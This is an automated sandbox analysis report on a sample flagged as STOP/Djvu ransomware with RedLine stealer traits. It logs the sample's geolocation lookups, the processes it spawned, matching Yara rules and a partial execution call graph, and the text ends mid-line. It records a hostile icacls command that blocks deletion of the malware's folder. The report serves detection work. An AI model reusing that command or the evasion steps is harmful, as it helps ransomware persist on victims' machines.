          access-control-allow-origin: *
          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXcTAd6bF5URDWgZCcoqAPfbVZ5w9lg4HVpMKKJcO9mORVKisp0Hlkc4ToMboA0h%2BbmXpwiePJpsuOX5dgU%2B6eK6IPBCDFwKdCitK8ViDQ6v4DpQyWdJi4TVNHpu"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8b518ea1ddeb1a03-EWR
          alt-svc: h3=":443"; ma=86400
          2024-08-18 11:27:52 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
          Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
          2024-08-18 11:27:52 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.649713188.114.96.34436420C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-18 11:28:02 UTC85OUTGET /geo.json HTTP/1.1
          User-Agent: Microsoft Internet Explorer
          Host: api.2ip.ua
          2024-08-18 11:28:02 UTC891INHTTP/1.1 200 OK
          Date: Sun, 18 Aug 2024 11:28:02 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          strict-transport-security: max-age=63072000; preload
          x-frame-options: SAMEORIGIN
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block; report=...
          access-control-allow-origin: *
          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9yOiQTMUKZ0wwvfjYWUVGo8YLsdxTjD%2FNilE59Mscn%2BpazfSqls1P7OM6x0vvg2UKRuEay4TiThVA0DTfodKZYvnpEhE9OgX3Ww%2Fs5Wt1sgJ22%2BBLjJB2mkuqlSa"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8b518edd0e5b8cb4-EWR
          alt-svc: h3=":443"; ma=86400
          2024-08-18 11:28:02 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
          Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
          2024-08-18 11:28:02 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.649721188.114.96.34431208C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          TimestampBytes transferredDirectionData
          2024-08-18 11:28:16 UTC85OUTGET /geo.json HTTP/1.1
          User-Agent: Microsoft Internet Explorer
          Host: api.2ip.ua
          2024-08-18 11:28:17 UTC891INHTTP/1.1 200 OK
          Date: Sun, 18 Aug 2024 11:28:17 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          strict-transport-security: max-age=63072000; preload
          x-frame-options: SAMEORIGIN
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block; report=...
          access-control-allow-origin: *
          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGyljPRY0ZYezHdvn5oUQkKbBE7%2B6E%2F5Qa%2F4l98uCnmbl5%2BLcXC39lvMjhGfXEgP7cfAgmRNZDvUcbpmL71z2zzBvrVUSVVaotUUCzOOes9zpYf6YNs8TG8PYUb6"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8b518f394bd58c60-EWR
          alt-svc: h3=":443"; ma=86400
          2024-08-18 11:28:17 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
          Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
          2024-08-18 11:28:17 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.649722188.114.96.34433392C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          TimestampBytes transferredDirectionData
          2024-08-18 11:28:20 UTC85OUTGET /geo.json HTTP/1.1
          User-Agent: Microsoft Internet Explorer
          Host: api.2ip.ua
          2024-08-18 11:28:21 UTC885INHTTP/1.1 200 OK
          Date: Sun, 18 Aug 2024 11:28:21 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          strict-transport-security: max-age=63072000; preload
          x-frame-options: SAMEORIGIN
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block; report=...
          access-control-allow-origin: *
          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YBSKFBnvek2ChhZVCw%2FcFdqj4McSofMMwUVtD7IyD83RECNFai4RzA2ci58Wb4YfaX06LHVe9NOJ8yGR7BUwkhwrWqekFDne6DXisJsbTyXxdvOro3EufcaMamNx"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8b518f530d7272aa-EWR
          alt-svc: h3=":443"; ma=86400
          2024-08-18 11:28:21 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
          Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
          2024-08-18 11:28:21 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.649723188.114.96.34434856C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          TimestampBytes transferredDirectionData
          2024-08-18 11:28:25 UTC85OUTGET /geo.json HTTP/1.1
          User-Agent: Microsoft Internet Explorer
          Host: api.2ip.ua
          2024-08-18 11:28:25 UTC891INHTTP/1.1 200 OK
          Date: Sun, 18 Aug 2024 11:28:25 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          strict-transport-security: max-age=63072000; preload
          x-frame-options: SAMEORIGIN
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block; report=...
          access-control-allow-origin: *
          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unKQWxNZgmb%2F1Maj7NJrt1Ze2OvMQhx4Jnijk%2FfvCh5CSggHbFHu3m%2Be0qawoUqDC0rUmWM9Ke8Gsf8iltzRFK1tsLl3Yuu1D%2FNMdYK6mpbmzLLbHhjwD88Bl6KD"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8b518f6d9d2c4411-EWR
          alt-svc: h3=":443"; ma=86400
          2024-08-18 11:28:25 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
          Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
          2024-08-18 11:28:25 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:07:27:44
          Start date:18/08/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\file.exe"
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2166960337.000000000214E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          Reputation:low
          Has exited:true

          Target ID:2
          Start time:07:27:50
          Start date:18/08/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\file.exe"
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
          Reputation:low
          Has exited:true

          Target ID:4
          Start time:07:27:52
          Start date:18/08/2024
          Path:C:\Windows\SysWOW64\icacls.exe
          Wow64 process (32bit):true
          Commandline:icacls "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Imagebase:0x8e0000
          File size:29'696 bytes
          MD5 hash:2E49585E4E08565F52090B144062F97E
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:07:27:52
          Start date:18/08/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.2271536703.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2271495369.0000000002190000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low
          Has exited:true

          Target ID:6
          Start time:07:27:54
          Start date:18/08/2024
          Path:C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe --Task
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2455882872.0000000002183000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          Antivirus matches:
          • Detection: 100%, Joe Sandbox ML
          • Detection: 34%, ReversingLabs
          • Detection: 36%, Virustotal, Browse
          Reputation:low
          Has exited:true

          Target ID:7
          Start time:07:28:00
          Start date:18/08/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000007.00000002.2763316136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
          Reputation:low
          Has exited:true

          Target ID:9
          Start time:07:28:03
          Start date:18/08/2024
          Path:C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2418701832.00000000021C3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.2418903589.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          Reputation:low
          Has exited:true

          Target ID:11
          Start time:07:28:11
          Start date:18/08/2024
          Path:C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.2503244707.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.2502982879.000000000213D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low
          Has exited:true

          Target ID:12
          Start time:07:28:15
          Start date:18/08/2024
          Path:C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.2433084829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
          Reputation:low
          Has exited:true

          Target ID:13
          Start time:07:28:18
          Start date:18/08/2024
          Path:C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe --Task
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
          Reputation:low
          Has exited:true

          Target ID:15
          Start time:07:28:23
          Start date:18/08/2024
          Path:C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          Imagebase:0x400000
          File size:795'648 bytes
          MD5 hash:006EDF0AC466164DDC9E0AC56474FE0A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000F.00000002.3353830143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
          Reputation:low
          Has exited:false

          Reset < >

            Execution Graph

            Execution Coverage:1.2%
            Dynamic/Decrypted Code Coverage:29.8%
            Signature Coverage:38.2%
            Total number of Nodes:131
            Total number of Limit Nodes:19
            execution_graph 37038 401600 37087 402588 37038->37087 37040 40160c GetStartupInfoA 37041 40162f 37040->37041 37088 4018e3 HeapCreate 37041->37088 37044 40167f 37099 403457 76 API calls 8 library calls 37044->37099 37047 401685 37048 401691 __RTC_Initialize 37047->37048 37049 401689 37047->37049 37090 40497d 72 API calls 3 library calls 37048->37090 37100 4015d7 67 API calls 3 library calls 37049->37100 37051 401690 37051->37048 37053 40169e 37054 4016a2 37053->37054 37055 4016aa GetCommandLineA 37053->37055 37101 4028ca 67 API calls 3 library calls 37054->37101 37091 404846 76 API calls 3 library calls 37055->37091 37058 4016a9 37058->37055 37059 4016ba 37102 40478b 112 API calls 3 library calls 37059->37102 37061 4016c4 37062 4016d0 37061->37062 37063 4016c8 37061->37063 37092 404513 111 API calls 6 library calls 37062->37092 37103 4028ca 67 API calls 3 library calls 37063->37103 37066 4016d5 37068 4016e1 37066->37068 37069 4016d9 37066->37069 37067 4016cf 37067->37062 37093 402989 74 API calls 5 library calls 37068->37093 37104 4028ca 67 API calls 3 library calls 37069->37104 37072 4016e0 37072->37068 37073 4016e7 37074 4016f3 37073->37074 37075 4016ec 37073->37075 37094 4044b4 111 API calls 2 library calls 37074->37094 37105 4028ca 67 API calls 3 library calls 37075->37105 37078 4016f2 37078->37074 37079 4016f8 37080 4016fd 37079->37080 37095 4a4fba 37079->37095 37080->37079 37082 401713 37083 401721 37082->37083 37106 402b3a 67 API calls _doexit 37082->37106 37107 402b66 67 API calls _doexit 37083->37107 37086 401726 _doexit 37087->37040 37089 401673 37088->37089 37089->37044 37098 4015d7 67 API calls 3 library calls 37089->37098 37090->37053 37091->37059 37092->37066 37093->37073 37094->37079 37108 4a4c54 37095->37108 37097 4a4fbf 37097->37082 37098->37044 37099->37047 37100->37051 37101->37058 37102->37061 37103->37067 37104->37072 37105->37078 37106->37083 37107->37086 37109 4a4c75 37108->37109 37110 4a4c98 FillConsoleOutputCharacterW 37109->37110 37111 4a4cd1 37109->37111 37110->37109 37112 4a4cfb 7 API calls 37111->37112 37113 4a4dd7 37111->37113 37151 405340 __VEC_memzero 37112->37151 37115 4a4de1 GetDateFormatA GetLastError GetSystemTimes 37113->37115 37121 4a4e33 37113->37121 37115->37113 37117 4a4e35 37115->37117 37116 4a4d4c GetDefaultCommConfigW RaiseException ReadConsoleOutputA WaitForDebugEvent EnumDateFormatsA 37119 4a4dbc 37116->37119 37120 4a4db1 TryEnterCriticalSection 37116->37120 37118 4a4e3e FoldStringW 37117->37118 37117->37121 37118->37121 37124 4a4dd1 37119->37124 37125 4a4dc5 LoadLibraryA LoadLibraryA 37119->37125 37120->37119 37122 4a4ee3 LocalAlloc 37121->37122 37123 4a4e56 6 API calls 37121->37123 37126 4a4f28 LoadLibraryA 37122->37126 37127 4a4f01 37122->37127 37153 401132 67 API calls 5 library calls 37123->37153 37152 4011fc 91 API calls __wcstoi64 37124->37152 37125->37124 37150 4a4af9 VirtualProtect 37126->37150 37127->37126 37131 4a4ebe 37154 401132 67 API calls 5 library calls 37131->37154 37132 4a4f38 37159 4a4bcc 12 API calls __setmbcp_nolock 37132->37159 37135 4a4ec4 37155 401015 67 API calls 7 library calls 37135->37155 37137 4a4eca 37156 401587 80 API calls _mbrtowc_s_l 37137->37156 37138 4a4f48 GlobalFlags GetFileType 37141 4a4f3d 37138->37141 37140 4a4ed3 37157 4010a3 67 API calls 2 library calls 37140->37157 37141->37138 37143 4a4f6c InterlockedDecrement 37141->37143 37147 4a4f80 37141->37147 37143->37141 37144 4a4eda 37158 401344 74 API calls __cinit 37144->37158 37146 4a4ee0 37146->37122 37160 401006 5 API calls __invoke_watson 37147->37160 37149 4a4fb6 37149->37097 37150->37132 37151->37116 37152->37113 37153->37131 37154->37135 37155->37137 37156->37140 37157->37144 37158->37146 37159->37141 37160->37149 37161 214e026 37162 214e035 37161->37162 37165 214e7c6 37162->37165 37166 214e7e1 37165->37166 37167 214e7ea CreateToolhelp32Snapshot 37166->37167 37168 214e806 Module32First 37166->37168 37167->37166 37167->37168 37169 214e815 37168->37169 37171 214e03e 37168->37171 37172 214e485 37169->37172 37173 214e4b0 37172->37173 37174 214e4c1 VirtualAlloc 37173->37174 37175 